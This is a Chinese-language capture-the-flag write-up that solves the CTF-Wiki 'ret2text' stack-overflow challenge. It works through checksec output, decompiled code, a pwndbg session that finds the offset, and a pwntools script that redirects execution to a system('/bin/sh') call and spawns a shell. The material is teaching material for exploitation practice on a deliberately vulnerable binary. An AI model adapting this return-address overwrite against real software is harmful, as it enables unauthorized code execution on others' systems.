题目来源

下载位置: https://raw.githubusercontent.com/ctf-wiki/ctf-challenges/master/pwn/stackoverflow/ret2text/bamboofox-ret2text/ret2text
PS:内容来自于CTF-WIKI

分析

文件类型

┌──(kali㉿kali)-[~/Desktop/pwn]
└─$ file ret2text
ret2text: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=4f13f004f23ea39d28ca91f2bb83110b4b73713f, with debug_info, not stripped

程序类型位32位ELF文件

防护措施

┌──(kali㉿kali)-[~/Desktop/pwn]
└─$ checksec --file=ret2text
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols         FORTIFY Fortified       Fortifiable     FILE
Partial RELRO   No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   83 Symbols        No    0               2               ret2text

防护措施好像就有个NX,NX是不允许在堆栈中执行shellcode

IDA分析

main函数内容如下

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s[100]; // [esp+1Ch] [ebp-64h] BYREF

  setvbuf(stdout, 0, 2, 0);
  setvbuf(_bss_start, 0, 1, 0);
  puts("There is something amazing here, do you know anything?");
  gets(s);
  printf("Maybe I will tell you next time !");
  return 0;
}

可以看到gets往s里面传值了,但是s的长度是100,这里就是一个简单的栈溢出。之后还找到了一个程序后门,代码内容如下

void secure()
{
  unsigned int v0; // eax
  int input; // [esp+18h] [ebp-10h] BYREF
  int secretcode; // [esp+1Ch] [ebp-Ch]

  v0 = time(0);
  srand(v0);
  secretcode = rand();
  __isoc99_scanf((int)&unk_8048760, (int)&input);
  if ( input == secretcode )
    system("/bin/sh");
}

关于system(/bin/sh)他就是留下的后门。。这里看一下他的详细信息

.text:0804863A ; 11:     system("/bin/sh");

他的地址是0804863A

攻击思路

使用栈溢出把程序结束时的返回地址改成后门的执行地址也就是0804863A,但是栈需要溢出多少位还不知道需要动态分析一下。

PWNDBG分析

┌──(kali㉿kali)-[~/Desktop/pwn]
└─$ gdb ret2text
pwndbg> b main
pwndbg> r
pwndbg> n
pwndbg> n
pwndbg> n
hello
25      in ret2text.c
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
───────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────────────────────────────
*EAX  0xffffcf1c ◂— 'hello'
 EBX  0xf7e23e34 (_GLOBAL_OFFSET_TABLE_) ◂— 0x223d2c /* ',="' */
*ECX  0xf7e258ac (_IO_stdfile_0_lock) ◂— 0
 EDX  0
 EDI  0xf7ffcb80 (_rtld_global_ro) ◂— 0
 ESI  0x80486d0 (__libc_csu_init) ◂— push ebp
 EBP  0xffffcf88 ◂— 0
 ESP  0xffffcf00 —▸ 0xffffcf1c ◂— 'hello'
*EIP  0x80486b3 (main+107) ◂— mov dword ptr [esp], 0x80487a4
─────────────────────────────────────────────────────────────[ DISASM / i386 / set emulate on ]─────────────────────────────────────────────────────────────
  ......
─────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────
......
───────────────────────────────────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────────────────────────────────── 
......
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> 

这里只写一些重要的操作和一些重要输出,输出中重点内容是

*EAX  0xffffcf1c ◂— 'hello'
 EBX  0xf7e23e34 (_GLOBAL_OFFSET_TABLE_) ◂— 0x223d2c /* ',="' */
*ECX  0xf7e258ac (_IO_stdfile_0_lock) ◂— 0
 EDX  0
 EDI  0xf7ffcb80 (_rtld_global_ro) ◂— 0
 ESI  0x80486d0 (__libc_csu_init) ◂— push ebp
 EBP  0xffffcf88 ◂— 0
 ESP  0xffffcf00 —▸ 0xffffcf1c ◂— 'hello'
*EIP  0x80486b3 (main+107) ◂— mov dword ptr [esp], 0x80487a4

EBP和ESP的地址间隔是0xffffcf88 - 0xffffcf1c= 4294954888 - 4294954780 = 108(这里可以直接用88h-1ch初学为了好理解就写全了),拿到间隔长度之后需要+4,因为要往返回地址中写内容,而返回地址的位置是再esp的上面所以需要+4。

============================
            返回地址
============================
            %esp
============================
            xxxxx
============================

PWNTools代码攻击

from pwn import *

io = process("./ret2text")

target = 0x804863a

payload = b"A" * (108 + 4) + p32(target)

io.sendline(payload)

io.interactive()

io.close()

效果展示

┌──(kali㉿kali)-[~/Desktop/pwn]
└─$ python test.py 
[+] Starting local process './ret2text': pid 35232
[*] Switching to interactive mode
There is something amazing here, do you know anything?
Maybe I will tell you next time !$ ls
core  ret2text    run  test.py
$ pwd
/home/kali/Desktop/pwn
$ exit
[*] Got EOF while reading in interactive
$ 
[*] Process './ret2text' stopped with exit code -11 (SIGSEGV) (pid 35232)
[*] Got EOF while sending in interactive
最后修改:2024 年 06 月 03 日
如果觉得我的文章对你有用,请随意赞赏